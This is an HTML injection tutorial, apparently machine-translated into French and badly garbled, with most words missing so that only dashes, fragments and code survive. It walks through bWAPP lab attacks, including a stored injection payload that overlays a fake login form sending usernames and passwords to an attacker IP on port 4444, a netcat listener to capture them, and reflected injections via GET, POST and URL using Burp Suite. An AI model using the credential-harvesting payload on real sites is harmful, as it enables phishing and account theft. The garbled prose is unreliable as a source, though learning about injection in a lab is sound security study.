🖕🏾 👋 👊 Un guide complet sur l'injection HTML 🔃 👼🏼 🎁

Le HTML est considéré comme le cadre de chaque application Web, définissant sa structure. Mais parfois, même l'écosystème le plus sophistiqué peut être ruiné par quelques scripts simples.

Aujourd'hui, nous allons apprendre comment les attaquants peuvent accéder à une application Web en utilisant des erreurs dans son code HTML.

Contenu:

Qu'est-ce que le HTML?
HTML-?
HTML-
HTML- XSS
- HTML
- HTML
  - GET
  - POST
  - URL
HTML-

HTML?

HTML (HyperText Markup Langauge) — , - -. HTML -, «», « » , .

— -. ».

HTML-

HTML , :

«»
«»
«» . .

, , :

HTML-, -.

HTML

, . «/», « » .

<a href = "https://alexhost.com">       </a>

«href» — « »
«https://alexhost.com» — « »

- HTML -.

HTML-

- HTML. , «.html», -.

, - hack.html:

<html>
<head>
<title> Hacking Articles lab</title>
</head>
<body bgcolor="pink">
<br>
<center><h2>WELCOME TO <a href=”http://hackingarticles.in”>HACKING ARTILCES </a></h2>
<br>
<p>Author “Raj Chandel”</p>
</center>
</body>
</html>

html — HTML-
head —
title — -
body — «bgcolor» «».
br — .
h1 — .
p —
a — , «».

HTML , .

, HTML -.

HTML-?

HTML- , .

, - :

html- HTML- , - .

, HTML-.

-, HTML- - . , «HTML- » , , « », .

« », , .

HTML-

-, :

(XSS)
(SSRF)

HTML- XSS

HTML- . XSS- Javascript , HTML- HTML .

HTML- , - .

HTML

« HTML» — -, , -. , , -, HTML- . HTML — « » , . HTML .

HTML

HTML- bWAPP, Kali Linux .

IP- bWAPP bee: bug, «Choose Your Bug» «HTML Injection – Stored (Blog)» .

-, HTML-, , .

, , -, , , « ».

, - IP-. HTML- , HTML-.

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid 
credenitals:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>

, «Submit» , - .

netcat 4444, .

nc –lvp 4444

, .

, «Raj» - «123». .

, .

HTML

HTML , - , . , HTML.

-, , .

HTML -, HTML-. - , HTML-.

HTML :

HTML GET. .
HTML POST. / .
HTML URL.

HTML GET

-, .

«Raj Chandel» «Good», «Thanks to Raj Chandel for your valuable time».

«/» URL- , HTML-.

HTML- «» .

<h1>Raj Chandel</h1>

"" "Good".

, Raj Chandel .

? .

, , «$ _GET».

« , , HTML- ».

, HTML- .

, ?

, «burp suite», «Repeater».

«Repeater», «Go» , HTML :

HTML-:

<a href = http://hackingarticles.inhibited> <h2> Raj </h2> </a>

«Decoder», «Encode as» URL-.

, «Encode as» URL, URL-.

URL «name =» Repeater Request. «GO», .

!!! , .

«Proxy» «Forward». , -, .

, , .

, «hack» . «<» «>» $data $input, PHP- urldecode over $input URL.

, «hack» .

HTML POST

- GET, «» «».

POST, URL-.

, .

<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">

, «Ignite technologies» , -, :

HTML URL

- HTML- -? , , :

URL- -, HTML- .

, URL- - «http://192.168.0.16/hack/html_URL.php». , .

«burp suite» HTTP-.

/hack/html_URL.php/<h1>Hey_are_you_there?</h1>

«Forward», .

!!! , -, HTML- URL- -.

PHP $ _SERVER URL- . , «HTTP_HOST» URL- «REQUEST_URI» $url.

HTML, echo $ url - , URL-.

HTML-

HTML-, .
, - , .

Un guide complet sur l'injection HTML

Contenu:

HTML?

HTML-

HTML

HTML-

HTML-?

HTML-

HTML- XSS

HTML

HTML

HTML

HTML GET

HTML POST

HTML URL

HTML-

More articles: